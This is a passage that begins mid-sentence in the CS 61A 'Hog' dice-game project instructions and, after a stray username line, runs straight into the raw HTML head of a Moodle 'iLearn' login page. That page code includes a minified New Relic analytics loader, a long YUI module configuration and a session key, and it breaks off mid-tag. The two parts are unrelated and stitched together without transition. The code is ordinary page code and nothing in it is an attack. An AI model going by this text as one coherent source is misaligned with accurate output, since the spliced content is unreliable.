do so, you need to first figure out what test_dice will do, based on the description above. You can exit the unlocker by typing exit() (without quotes). Typing Ctrl-C on Windows to exit out of the unlocker has been known to cause problems, so avoid doing so. Problem 1 (2 pt) Implement the roll_dice function in hog.py. It takes two arguments: a positive integer called num_rolls giving the number of dice to roll and a dice function. It returns the number of points scored by rolling the dice that number of times in a turn: either the sum of the outcomes or 1 (Pig Out). To obtain a single outcome of a dice roll, call dice(). You should call dice() exactly num_rolls times in the body of roll_dice. Remember to call dice() exactly num_rolls times even if Pig Out happens in the middle of rolling. In this way, we correctly simulate rolling all the dice together. Checking Your Work: Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 01 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 01 If the tests don't pass, it's time to debug. You can observe the behavior of your function using Python directly. First, start the Python interpreter and load the hog.py file. python3 -i hog.py Then, you can call your roll_dice function on any number of dice you want, such as 4. >>> roll_dice(4) In most systems, you can evaluate the same expression again by pressing the up arrow or Control-P, then pressing enter or return. You should find that evaluating this call expression gives a different answer each time, since dice rolls are random. The roll_dice function has a default argument value for dice that is a random six-sided dice function. You can also use test dice that fix the outcomes of the dice in advance. For example, rolling twice when you know that the dice will come up 3 and 4 should give a total outcome of 7. >>> fixed_dice = make_test_dice(3, 4) >>> roll_dice(2, fixed_dice) 7 If you find a problem, you need to change your hog.py file, save it, quit Python, start it again, and then start evaluating expressions. Pressing the up arrow should give you access to your previous expressions, even after restarting Python. Once you think that your roll_dice function is correct, run the ok tests again. Tests like these don't prove that your program is exactly correct, but they help you build confidence that this part of your program does what you expect, so that you can trust the abstraction it defines as you proceed. Problem 2 (1 pt) Implement the free_bacon helper function that returns the number of points scored by rolling 0 dice, based on the opponent's current score. You can assume that score is less than 100. For a score less than 10, assume that the first of the two digits is 0. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 02 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 02 You can also test free_bacon interactively by entering python3 -i hog.py in the terminal and then calling free_bacon with various inputs. Problem 3 (1 pt) Implement the take_turn function, which returns the number of points scored for a turn by the current player. Your implementation should call roll_dice when possible. You will need to implement the Free Bacon rule. You can assume that opponent_score is less than 100. Call free_bacon in your implementation of take_turn. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 03 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 03 Problem 4 (1 pt) Implement is_swap, which returns whether or not the scores should be swapped because one is an integer multiple of the other. The is_swap function takes two arguments: the player scores. It returns a boolean value to indicate whether the Swine Swap condition is met. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 04 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 04 Problem 5 (3 pt) Implement the play function, which simulates a full game of Hog. Players alternate turns, each using their respective strategy function (Player 0 uses strategy0, etc.), until one of the players reaches the goal score. When the game ends, play returns the final total scores of both players, with Player 0's score first, and Player 1's score second. Here are some hints: You should use the functions you have already written! You will need to call take_turn with all three arguments. Only call take_turn once per turn. Enforce all the special rules. You can get the number of the other player (either 0 or 1) by calling the provided function other. You can ignore the say argument to the play function for now. You will use it in Phase 2 of the project. A strategy is a function that, given a player's score and their opponent's score, returns how many dice the player wants to roll. A strategy function (such as strategy0 and strategy1) takes two arguments: scores for the current player and opposing player, which both must be non-negative integers. A strategy function returns the number of dice that the current player wants to roll in the turn. Each strategy function should be called only once per turn. Don't worry about the details of implementing strategies yet. You will develop them in Phase 3. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 05 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 05 The last test for Question 5 is a fuzz test, which checks that your play function works for a large number of different inputs. Failing this test means something is wrong, but you should look at other tests to see where the problem might be. Once you are finished, you will be able to play a graphical version of the game. We have provided a file called hog_gui.py that you can run from the terminal: python3 hog_gui.py If you don't already have Tkinter (Python's graphics library) installed, you'll need to install it first before you can run the GUI. The GUI relies on your implementation, so if you have any bugs in your code, they will be reflected in the GUI. This means you can also use the GUI as a debugging tool; however, it's better to run the tests first. Congratulations! You have finished Phase 1 of this project! Phase 2: Commentary In the second phase, you will implement commentary functions that print remarks about the game, such as, "22 points! That's the biggest gain yet for Player 1." A commentary function takes two arguments, the current score for Player 0 and the current score for Player 1. It returns another commentary function to be called on the next turn. It may also print some output as a side effect of being called. The function say_scores in hog.py is an example of a commentary function. The function announce_lead_changes is an example of a higher-order function that returns a commentary function. def say_scores(score0, score1): """A commentary function that announces the score for each player.""" print("Player 0 now has", score0, "and Player 1 now has", score1) return say_scores def announce_lead_changes(previous_leader=None): """Return a commentary function that announces lead changes. >>> f0 = announce_lead_changes() >>> f1 = f0(5, 0) Player 0 takes the lead by 5 >>> f2 = f1(5, 12) Player 1 takes the lead by 7 >>> f3 = f2(8, 12) >>> f4 = f3(8, 13) >>> f5 = f4(15, 13) Player 0 takes the lead by 2 """ def say(score0, score1): if score0 > score1: leader = 0 elif score1 > score0: leader = 1 else: leader = None if leader != None and leader != previous_leader: print('Player', leader, 'takes the lead by', abs(score0 - score1)) return announce_lead_changes(leader) return say Problem 6 (2 pt) Update your play function so that a commentary function is called at the end of each turn. say(score0, score1) should be called at the end of the first turn. Its return value (another commentary function) should be called at the end of the second turn. Each turn, a new commentary function should be called that is the return value of the previous call to a commentary function. Also implement both, a function that takes two commentary functions (f and g) and returns a new commentary function. This new commentary function returns another commentary function which calls the functions returned by calling f and g, in that order. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 06 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 06 Problem 7 (2 pt) Implement the announce_highest function, which is a higher-order function that returns a commentary function. This commentary function announces whenever a particular player gains more points in a turn than ever before. To compute the gain, it must compare the score from last turn to the score from this turn for the player of interest, which is designated by the who argument. This function must also keep track of the highest gain for the player so far. The way in which announce_highest announces is very specific, and your implementation should match the doctests provided. Notice in particular that if the gain is only 1 point, then the message includes "point" in singular form. If the gain is larger, then the message includes "points" in plural form. Use Ok to test your code: python3 ok -q 07 Hint. The announce_lead_changes function provided to you is an example of how to keep track of information using commentary functions. If you are stuck, first make sure you understand how announce_lead_changes works. When you are done, if play the game again, you will see the commentary. python3 hog_gui.py The commentary in the GUI is generated by passing the following function as the say argument to play. both(announce_highest(0), both(announce_highest(1), announce_lead_changes())) Great work! You just finished Phase 2 of the project! Phase 3: Strategies In the third phase, you will experiment with ways to improve upon the basic strategy of always rolling a fixed number of dice. First, you need to develop some tools to evaluate strategies. Problem 8 (2 pt) Implement the make_averaged function, which is a higher-order function that takes a function fn as an argument. It returns another function that takes the same number of arguments as fn (the function originally passed into make_averaged). This returned function differs from the input function in that it returns the average value of repeatedly calling fn on the same arguments. This function should call fn a total of num_samples times and return the average of the results. To implement this function, you need a new piece of Python syntax! You must write a function that accepts an arbitrary number of arguments, then calls another function using exactly those arguments. Here's how it works. Instead of listing formal parameters for a function, we write *args. To call another function using exactly those arguments, we call it again with *args. For example, >>> def printed(fn): ... def print_and_return(*args): ... result = fn(*args) ... print('Result:', result) ... return result ... return print_and_return >>> printed_pow = printed(pow) >>> printed_pow(2, 8) Result: 256 256 >>> printed_abs = printed(abs) >>> printed_abs(-10) Result: 10 10 Read the docstring for make_averaged carefully to understand how it is meant to work. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 08 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 08 Problem 9 (1 pt) Implement the max_scoring_num_rolls function, which runs an experiment to determine the number of rolls (from 1 to 10) that gives the maximum average score for a turn. Your implementation should use make_averaged and roll_dice. If two numbers of rolls are tied for the maximum average score, return the lower number. For example, if both 3 and 6 achieve a maximum average score, return 3. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 09 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 09 To run this experiment on randomized dice, call run_experiments using the -r option: python3 hog.py -r Running experiments For the remainder of this project, you can change the implementation of run_experiments as you wish. By calling average_win_rate, you can evaluate various Hog strategies. For example, change the first if False: to if True: in order to evaluate always_roll(8) against the baseline strategy of always_roll(4). You should find that it wins slightly more often than it loses, giving a win rate around 0.5. Some of the experiments may take up to a minute to run. You can always reduce the number of samples in make_averaged to speed up experiments. Problem 10 (1 pt) A strategy can take advantage of the Free Bacon rule by rolling 0 when it is most beneficial to do so. Implement bacon_strategy, which returns 0 whenever rolling 0 would give at least margin points and returns num_rolls otherwise. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 10 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 10 Once you have implemented this strategy, change run_experiments to evaluate your new strategy against the baseline. You should find that it wins more than half of the time. Problem 11 (2 pt) A strategy can also take advantage of the Swine Swap rule. The swap_strategy rolls 0 if it would cause a beneficial swap. It also returns 0 if rolling 0 would give at least margin points and would not cause a swap. Otherwise, the strategy rolls num_rolls. Before writing any code, unlock the tests to verify your understanding of the question. python3 ok -q 11 -u Once you are done unlocking, begin implementing your solution. You can check your correctness with: python3 ok -q 11 Once you have implemented this strategy, update run_experiments to evaluate your new strategy against the baseline. You should find that it gives a significant edge over always_roll(4). Optional: Problem 12 (0 pt) Implement final_strategy, which combines these ideas and any other ideas you have to achieve a high win rate against the always_roll(4) strategy. Some suggestions: swap_strategy is a good default strategy to start with. There's no point in scoring more than 100. Check whether you can win by rolling 0, 1 or 2 dice. If you are in the lead, you might take fewer risks. Try to force a beneficial swap. Choose the num_rolls and margin arguments carefully. You can check that your final strategy is valid by running Ok. python3 ok -q 12 You can also check your exact final winrate by running python3 calc.py At this point, run the entire autograder to see if there are any tests that don't pass. python3 ok Once you are satisfied, submit to Ok to complete the project. python3 ok --submit You can also play against your final strategy with the graphical user interface: python3 hog_gui.py -f The GUI will alternate which player is controlled by you. Congratulations, you have reached the end of your first CS 61A project! If you haven't already, relax and enjoy a few games of Hog with a friend.
thewebdeveloper2017
<!DOCTYPE html> <html dir="ltr" lang="en" xml:lang="en"> <head> <!-- front --> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>iLearn: Log in to the site</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,t,n){function r(n){if(!t[n]){var o=t[n]={exports:{}};e[n][0].call(o.exports,function(t){var o=e[n][1][t];return r(o||t)},o,o.exports)}return t[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<n.length;o++)r(n[o]);return r}({1:[function(e,t,n){function r(){}function o(e,t,n){return function(){return i(e,[(new Date).getTime()].concat(u(arguments)),t?null:this,n),t?void 0:this}}var i=e("handle"),a=e(2),u=e(3),c=e("ee").get("tracer"),f=NREUM;"undefined"==typeof window.newrelic&&(newrelic=f);var s=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],l="api-",p=l+"ixn-";a(s,function(e,t){f[t]=o(l+t,!0,"api")}),f.addPageAction=o(l+"addPageAction",!0),f.setCurrentRouteName=o(l+"routeName",!0),t.exports=newrelic,f.interaction=function(){return(new r).get()};var d=r.prototype={createTracer:function(e,t){var n={},r=this,o="function"==typeof t;return i(p+"tracer",[Date.now(),e,n],r),function(){if(c.emit((o?"":"no-")+"fn-start",[Date.now(),r,o],n),o)try{return t.apply(this,arguments)}finally{c.emit("fn-end",[Date.now()],n)}}}};a("setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,t){d[t]=o(p+t)}),newrelic.noticeError=function(e){"string"==typeof e&&(e=new Error(e)),i("err",[e,(new Date).getTime()])}},{}],2:[function(e,t,n){function r(e,t){var n=[],r="",i=0;for(r in e)o.call(e,r)&&(n[i]=t(r,e[r]),i+=1);return n}var o=Object.prototype.hasOwnProperty;t.exports=r},{}],3:[function(e,t,n){function r(e,t,n){t||(t=0),"undefined"==typeof n&&(n=e?e.length:0);for(var r=-1,o=n-t||0,i=Array(o<0?0:o);++r<o;)i[r]=e[t+r];return i}t.exports=r},{}],ee:[function(e,t,n){function r(){}function o(e){function t(e){return e&&e instanceof r?e:e?c(e,u,i):i()}function n(n,r,o){if(!p.aborted){e&&e(n,r,o);for(var i=t(o),a=v(n),u=a.length,c=0;c<u;c++)a[c].apply(i,r);var f=s[w[n]];return f&&f.push([y,n,r,i]),i}}function d(e,t){b[e]=v(e).concat(t)}function v(e){return b[e]||[]}function g(e){return l[e]=l[e]||o(n)}function m(e,t){f(e,function(e,n){t=t||"feature",w[n]=t,t in s||(s[t]=[])})}var b={},w={},y={on:d,emit:n,get:g,listeners:v,context:t,buffer:m,abort:a,aborted:!1};return y}function i(){return new r}function a(){(s.api||s.feature)&&(p.aborted=!0,s=p.backlog={})}var u="nr@context",c=e("gos"),f=e(2),s={},l={},p=t.exports=o();p.backlog=s},{}],gos:[function(e,t,n){function r(e,t,n){if(o.call(e,t))return e[t];var r=n();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,t,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[t]=r,r}var o=Object.prototype.hasOwnProperty;t.exports=r},{}],handle:[function(e,t,n){function r(e,t,n,r){o.buffer([e],r),o.emit(e,t,n)}var o=e("ee").get("handle");t.exports=r,r.ee=o},{}],id:[function(e,t,n){function r(e){var t=typeof e;return!e||"object"!==t&&"function"!==t?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");t.exports=r},{}],loader:[function(e,t,n){function r(){if(!h++){var e=y.info=NREUM.info,t=l.getElementsByTagName("script")[0];if(setTimeout(f.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&t))return f.abort();c(b,function(t,n){e[t]||(e[t]=n)}),u("mark",["onload",a()],null,"api");var n=l.createElement("script");n.src="https://"+e.agent,t.parentNode.insertBefore(n,t)}}function o(){"complete"===l.readyState&&i()}function i(){u("mark",["domContent",a()],null,"api")}function a(){return(new Date).getTime()}var u=e("handle"),c=e(2),f=e("ee"),s=window,l=s.document,p="addEventListener",d="attachEvent",v=s.XMLHttpRequest,g=v&&v.prototype;NREUM.o={ST:setTimeout,CT:clearTimeout,XHR:v,REQ:s.Request,EV:s.Event,PR:s.Promise,MO:s.MutationObserver},e(1);var m=""+location,b={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1016.min.js"},w=v&&g&&g[p]&&!/CriOS/.test(navigator.userAgent),y=t.exports={offset:a(),origin:m,features:{},xhrWrappable:w};l[p]?(l[p]("DOMContentLoaded",i,!1),s[p]("load",r,!1)):(l[d]("onreadystatechange",o),s[d]("onload",r)),u("mark",["firstbyte",a()],null,"api");var h=0},{}]},{},["loader"]);</script> <meta name="keywords" content="moodle, iLearn: Log in to the site" /> <link rel="stylesheet" type="text/css" href="https://ilearn.mq.edu.au/theme/yui_combo.php?r1487942275&rollup/3.17.2/yui-moodlesimple-min.css" /><script id="firstthemesheet" type="text/css">/** Required in order to fix style inclusion problems in IE with YUI **/</script><link rel="stylesheet" type="text/css" href="https://ilearn.mq.edu.au/theme/styles.php/mqu/1487942275/all" /> <script type="text/javascript"> //<![CDATA[ var M = {}; M.yui = {}; M.pageloadstarttime = new Date(); M.cfg = {"wwwroot":"https:\/\/ilearn.mq.edu.au","sesskey":"mDL5SddUvA","loadingicon":"https:\/\/ilearn.mq.edu.au\/theme\/image.php\/mqu\/core\/1487942275\/i\/loading_small","themerev":"1487942275","slasharguments":1,"theme":"mqu","jsrev":"1487942275","admin":"admin","svgicons":true};var yui1ConfigFn = function(me) {if(/-skin|reset|fonts|grids|base/.test(me.name)){me.type='css';me.path=me.path.replace(/\.js/,'.css');me.path=me.path.replace(/\/yui2-skin/,'/assets/skins/sam/yui2-skin')}}; var yui2ConfigFn = function(me) {var parts=me.name.replace(/^moodle-/,'').split('-'),component=parts.shift(),module=parts[0],min='-min';if(/-(skin|core)$/.test(me.name)){parts.pop();me.type='css';min=''};if(module){var filename=parts.join('-');me.path=component+'/'+module+'/'+filename+min+'.'+me.type}else me.path=component+'/'+component+'.'+me.type}; YUI_config = {"debug":false,"base":"https:\/\/ilearn.mq.edu.au\/lib\/yuilib\/3.17.2\/","comboBase":"https:\/\/ilearn.mq.edu.au\/theme\/yui_combo.php?r1487942275&","combine":true,"filter":null,"insertBefore":"firstthemesheet","groups":{"yui2":{"base":"https:\/\/ilearn.mq.edu.au\/lib\/yuilib\/2in3\/2.9.0\/build\/","comboBase":"https:\/\/ilearn.mq.edu.au\/theme\/yui_combo.php?r1487942275&","combine":true,"ext":false,"root":"2in3\/2.9.0\/build\/","patterns":{"yui2-":{"group":"yui2","configFn":yui1ConfigFn}}},"moodle":{"name":"moodle","base":"https:\/\/ilearn.mq.edu.au\/theme\/yui_combo.php?m\/1487942275\/","combine":true,"comboBase":"https:\/\/ilearn.mq.edu.au\/theme\/yui_combo.php?r1487942275&","ext":false,"root":"m\/1487942275\/","patterns":{"moodle-":{"group":"moodle","configFn":yui2ConfigFn}},"filter":null,"modules":{"moodle-core-actionmenu":{"requires":["base","event","node-event-simulate"]},"moodle-core-blocks":{"requires":["base","node","io","dom","dd","dd-scroll","moodle-core-dragdrop","moodle-core-notification"]},"moodle-core-checknet":{"requires":["base-base","moodle-core-notification-alert","io-base"]},"moodle-core-chooserdialogue":{"requires":["base","panel","moodle-core-notification"]},"moodle-core-dock":{"requires":["base","node","event-custom","event-mouseenter","event-resize","escape","moodle-core-dock-loader","moodle-core-event"]},"moodle-core-dock-loader":{"requires":["escape"]},"moodle-core-dragdrop":{"requires":["base","node","io","dom","dd","event-key","event-focus","moodle-core-notification"]},"moodle-core-event":{"requires":["event-custom"]},"moodle-core-formautosubmit":{"requires":["base","event-key"]},"moodle-core-formchangechecker":{"requires":["base","event-focus","moodle-core-event"]},"moodle-core-handlebars":{"condition":{"trigger":"handlebars","when":"after"}},"moodle-core-languninstallconfirm":{"requires":["base","node","moodle-core-notification-confirm","moodle-core-notification-alert"]},"moodle-core-lockscroll":{"requires":["plugin","base-build"]},"moodle-core-maintenancemodetimer":{"requires":["base","node"]},"moodle-core-notification":{"requires":["moodle-core-notification-dialogue","moodle-core-notification-alert","moodle-core-notification-confirm","moodle-core-notification-exception","moodle-core-notification-ajaxexception"]},"moodle-core-notification-dialogue":{"requires":["base","node","panel","escape","event-key","dd-plugin","moodle-core-widget-focusafterclose","moodle-core-lockscroll"]},"moodle-core-notification-alert":{"requires":["moodle-core-notification-dialogue"]},"moodle-core-notification-confirm":{"requires":["moodle-core-notification-dialogue"]},"moodle-core-notification-exception":{"requires":["moodle-core-notification-dialogue"]},"moodle-core-notification-ajaxexception":{"requires":["moodle-core-notification-dialogue"]},"moodle-core-popuphelp":{"requires":["moodle-core-tooltip"]},"moodle-core-session-extend":{"requires":["base","node","io-base","panel","dd-plugin"]},"moodle-core-tooltip":{"requires":["base","node","io-base","moodle-core-notification-dialogue","json-parse","widget-position","widget-position-align","event-outside","cache-base"]},"moodle-core_availability-form":{"requires":["base","node","event","panel","moodle-core-notification-dialogue","json"]},"moodle-backup-backupselectall":{"requires":["node","event","node-event-simulate","anim"]},"moodle-backup-confirmcancel":{"requires":["node","node-event-simulate","moodle-core-notification-confirm"]},"moodle-calendar-info":{"requires":["base","node","event-mouseenter","event-key","overlay","moodle-calendar-info-skin"]},"moodle-course-categoryexpander":{"requires":["node","event-key"]},"moodle-course-dragdrop":{"requires":["base","node","io","dom","dd","dd-scroll","moodle-core-dragdrop","moodle-core-notification","moodle-course-coursebase","moodle-course-util"]},"moodle-course-formatchooser":{"requires":["base","node","node-event-simulate"]},"moodle-course-management":{"requires":["base","node","io-base","moodle-core-notification-exception","json-parse","dd-constrain","dd-proxy","dd-drop","dd-delegate","node-event-delegate"]},"moodle-course-modchooser":{"requires":["moodle-core-chooserdialogue","moodle-course-coursebase"]},"moodle-course-toolboxes":{"requires":["node","base","event-key","node","io","moodle-course-coursebase","moodle-course-util"]},"moodle-course-util":{"requires":["node"],"use":["moodle-course-util-base"],"submodules":{"moodle-course-util-base":{},"moodle-course-util-section":{"requires":["node","moodle-course-util-base"]},"moodle-course-util-cm":{"requires":["node","moodle-course-util-base"]}}},"moodle-form-dateselector":{"requires":["base","node","overlay","calendar"]},"moodle-form-passwordunmask":{"requires":["node","base"]},"moodle-form-shortforms":{"requires":["node","base","selector-css3","moodle-core-event"]},"moodle-form-showadvanced":{"requires":["node","base","selector-css3"]},"moodle-core_message-messenger":{"requires":["escape","handlebars","io-base","moodle-core-notification-ajaxexception","moodle-core-notification-alert","moodle-core-notification-dialogue","moodle-core-notification-exception"]},"moodle-core_message-deletemessage":{"requires":["node","event"]},"moodle-question-chooser":{"requires":["moodle-core-chooserdialogue"]},"moodle-question-preview":{"requires":["base","dom","event-delegate","event-key","core_question_engine"]},"moodle-question-qbankmanager":{"requires":["node","selector-css3"]},"moodle-question-searchform":{"requires":["base","node"]},"moodle-availability_completion-form":{"requires":["base","node","event","moodle-core_availability-form"]},"moodle-availability_date-form":{"requires":["base","node","event","io","moodle-core_availability-form"]},"moodle-availability_grade-form":{"requires":["base","node","event","moodle-core_availability-form"]},"moodle-availability_group-form":{"requires":["base","node","event","moodle-core_availability-form"]},"moodle-availability_grouping-form":{"requires":["base","node","event","moodle-core_availability-form"]},"moodle-availability_profile-form":{"requires":["base","node","event","moodle-core_availability-form"]},"moodle-qtype_ddimageortext-dd":{"requires":["node","dd","dd-drop","dd-constrain"]},"moodle-qtype_ddimageortext-form":{"requires":["moodle-qtype_ddimageortext-dd","form_filepicker"]},"moodle-qtype_ddmarker-dd":{"requires":["node","event-resize","dd","dd-drop","dd-constrain","graphics"]},"moodle-qtype_ddmarker-form":{"requires":["moodle-qtype_ddmarker-dd","form_filepicker","graphics","escape"]},"moodle-qtype_ddwtos-dd":{"requires":["node","dd","dd-drop","dd-constrain"]},"moodle-mod_assign-history":{"requires":["node","transition"]},"moodle-mod_attendance-groupfilter":{"requires":["base","node"]},"moodle-mod_dialogue-autocomplete":{"requires":["base","node","json-parse","autocomplete","autocomplete-filters","autocomplete-highlighters","event","event-key"]},"moodle-mod_dialogue-clickredirector":{"requires":["base","node","json-parse","clickredirector","clickredirector-filters","clickredirector-highlighters","event","event-key"]},"moodle-mod_dialogue-userpreference":{"requires":["base","node","json-parse","userpreference","userpreference-filters","userpreference-highlighters","event","event-key"]},"moodle-mod_forum-subscriptiontoggle":{"requires":["base-base","io-base"]},"moodle-mod_oublog-savecheck":{"requires":["base","node","io","panel","moodle-core-notification-alert"]},"moodle-mod_oublog-tagselector":{"requires":["base","node","autocomplete","autocomplete-filters","autocomplete-highlighters"]},"moodle-mod_quiz-autosave":{"requires":["base","node","event","event-valuechange","node-event-delegate","io-form"]},"moodle-mod_quiz-dragdrop":{"requires":["base","node","io","dom","dd","dd-scroll","moodle-core-dragdrop","moodle-core-notification","moodle-mod_quiz-quizbase","moodle-mod_quiz-util-base","moodle-mod_quiz-util-page","moodle-mod_quiz-util-slot","moodle-course-util"]},"moodle-mod_quiz-modform":{"requires":["base","node","event"]},"moodle-mod_quiz-questionchooser":{"requires":["moodle-core-chooserdialogue","moodle-mod_quiz-util","querystring-parse"]},"moodle-mod_quiz-quizbase":{"requires":["base","node"]},"moodle-mod_quiz-quizquestionbank":{"requires":["base","event","node","io","io-form","yui-later","moodle-question-qbankmanager","moodle-core-notification-dialogue"]},"moodle-mod_quiz-randomquestion":{"requires":["base","event","node","io","moodle-core-notification-dialogue"]},"moodle-mod_quiz-repaginate":{"requires":["base","event","node","io","moodle-core-notification-dialogue"]},"moodle-mod_quiz-toolboxes":{"requires":["base","node","event","event-key","io","moodle-mod_quiz-quizbase","moodle-mod_quiz-util-slot","moodle-core-notification-ajaxexception"]},"moodle-mod_quiz-util":{"requires":["node"],"use":["moodle-mod_quiz-util-base"],"submodules":{"moodle-mod_quiz-util-base":{},"moodle-mod_quiz-util-slot":{"requires":["node","moodle-mod_quiz-util-base"]},"moodle-mod_quiz-util-page":{"requires":["node","moodle-mod_quiz-util-base"]}}},"moodle-message_airnotifier-toolboxes":{"requires":["base","node","io"]},"moodle-filter_glossary-autolinker":{"requires":["base","node","io-base","json-parse","event-delegate","overlay","moodle-core-event","moodle-core-notification-alert","moodle-core-notification-exception","moodle-core-notification-ajaxexception"]},"moodle-filter_mathjaxloader-loader":{"requires":["moodle-core-event"]},"moodle-editor_atto-editor":{"requires":["node","transition","io","overlay","escape","event","event-simulate","event-custom","node-event-html5","node-event-simulate","yui-throttle","moodle-core-notification-dialogue","moodle-core-notification-confirm","moodle-editor_atto-rangy","handlebars","timers","querystring-stringify"]},"moodle-editor_atto-plugin":{"requires":["node","base","escape","event","event-outside","handlebars","event-custom","timers","moodle-editor_atto-menu"]},"moodle-editor_atto-menu":{"requires":["moodle-core-notification-dialogue","node","event","event-custom"]},"moodle-editor_atto-rangy":{"requires":[]},"moodle-report_eventlist-eventfilter":{"requires":["base","event","node","node-event-delegate","datatable","autocomplete","autocomplete-filters"]},"moodle-report_loglive-fetchlogs":{"requires":["base","event","node","io","node-event-delegate"]},"moodle-gradereport_grader-gradereporttable":{"requires":["base","node","event","handlebars","overlay","event-hover"]},"moodle-gradereport_history-userselector":{"requires":["escape","event-delegate","event-key","handlebars","io-base","json-parse","moodle-core-notification-dialogue"]},"moodle-tool_capability-search":{"requires":["base","node"]},"moodle-tool_lp-dragdrop-reorder":{"requires":["moodle-core-dragdrop"]},"moodle-assignfeedback_editpdf-editor":{"requires":["base","event","node","io","graphics","json","event-move","event-resize","transition","querystring-stringify-simple","moodle-core-notification-dialog","moodle-core-notification-exception","moodle-core-notification-ajaxexception"]},"moodle-atto_accessibilitychecker-button":{"requires":["color-base","moodle-editor_atto-plugin"]},"moodle-atto_accessibilityhelper-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_align-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_bold-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_charmap-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_chemistry-button":{"requires":["moodle-editor_atto-plugin","moodle-core-event","io","event-valuechange","tabview","array-extras"]},"moodle-atto_clear-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_collapse-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_emoticon-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_equation-button":{"requires":["moodle-editor_atto-plugin","moodle-core-event","io","event-valuechange","tabview","array-extras"]},"moodle-atto_html-button":{"requires":["moodle-editor_atto-plugin","event-valuechange"]},"moodle-atto_image-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_indent-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_italic-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_link-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_managefiles-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_managefiles-usedfiles":{"requires":["node","escape"]},"moodle-atto_media-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_noautolink-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_orderedlist-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_rtl-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_strike-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_subscript-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_superscript-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_table-button":{"requires":["moodle-editor_atto-plugin","moodle-editor_atto-menu","event","event-valuechange"]},"moodle-atto_title-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_underline-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_undo-button":{"requires":["moodle-editor_atto-plugin"]},"moodle-atto_unorderedlist-button":{"requires":["moodle-editor_atto-plugin"]}}},"gallery":{"name":"gallery","base":"https:\/\/ilearn.mq.edu.au\/lib\/yuilib\/gallery\/","combine":true,"comboBase":"https:\/\/ilearn.mq.edu.au\/theme\/yui_combo.php?","ext":false,"root":"gallery\/1487942275\/","patterns":{"gallery-":{"group":"gallery"}}}},"modules":{"core_filepicker":{"name":"core_filepicker","fullpath":"https:\/\/ilearn.mq.edu.au\/lib\/javascript.php\/1487942275\/repository\/filepicker.js","requires":["base","node","node-event-simulate","json","async-queue","io-base","io-upload-iframe","io-form","yui2-treeview","panel","cookie","datatable","datatable-sort","resize-plugin","dd-plugin","escape","moodle-core_filepicker"]},"core_comment":{"name":"core_comment","fullpath":"https:\/\/ilearn.mq.edu.au\/lib\/javascript.php\/1487942275\/comment\/comment.js","requires":["base","io-base","node","json","yui2-animation","overlay"]}}}; M.yui.loader = {modules: {}}; //]]> </script> <meta name="robots" content="noindex" /> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script> <![endif]--> <link rel="apple-touch-icon-precomposed" href="https://ilearn.mq.edu.au/theme/image.php/mqu/theme/1487942275/apple-touch-icon-144-precomposed" sizes="144x144"> <link rel="shortcut icon" href="https://ilearn.mq.edu.au/theme/image.php/mqu/theme/1487942275/favicon"> </head> <body id="page-login-index" class="format-site path-login gecko dir-ltr lang-en yui-skin-sam yui3-skin-sam ilearn-mq-edu-au pagelayout-login course-1 context-1 notloggedin content-only layout-option-noblocks layout-option-nocourseheaderfooter layout-option-nocustommenu layout-option-nofooter layout-option-nonavbar"> <div class="skiplinks"><a class="skip" href="#maincontent">Skip to main content</a></div> <script type="text/javascript" 